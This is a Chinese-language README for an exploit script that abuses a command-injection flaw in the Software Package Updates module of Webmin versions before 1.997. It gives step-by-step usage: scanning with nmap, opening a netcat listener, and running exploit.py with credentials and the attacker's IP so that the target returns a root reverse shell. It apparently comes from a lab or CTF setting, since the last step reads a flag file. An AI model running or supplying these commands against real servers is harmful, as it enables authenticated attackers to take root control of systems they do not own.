用于利用 Webmin 1.997 之前版本中通过 Software Package Updates 模块存在的远程代码执行漏洞的 Exploit。
Webmin 的 Software Package Updates 模块在将 u 参数传递给系统之前未能正确进行清理。拥有该模块访问权限的已认证用户可以注入任意命令,这些命令将以 root 身份执行。
在运行 Exploit 之前安装依赖项:
pip3 install requests beautifulsoup4 lxml urllib3
| 参数 | 描述 | 示例 |
|---|---|---|
-t | 目标 URL(不带端口) | https://192.168.1.10 |
-u | Webmin 用户名 | admin |
-p | Webmin 密码 | password123 |
-l | 你的 IP(用于接收 shell) | 192.168.1.5 |
-lp | 监听端口 | 4444 |
1 — 使用 Nmap 识别目标 IP:
nmap -sV TARGET_IP
# 查找 Webmin 的 10000 端口
2 — 在你的机器上打开监听器:
nc -lvnp 4444
3 — 在另一个终端中运行 Exploit:
python3 exploit.py \
-t https://TARGET_IP \
-u admin \
-p PASSWORD \
-l TU_IP \
-lp 4444
4 — 如果 Exploit 成功,你将看到:
5 — 在监听器中你将收到一个 root 身份的 Shell:
# whoami
root
# cat /root/Desktop/FLAG.txt
FLAG{...}
# 终端 1
nc -lvnp 4444
# 终端 2
python3 exploit.py -t https://192.168.253.156 -u admin -p 'W3bm1n2024' -l 192.168.253.130 -lp 4444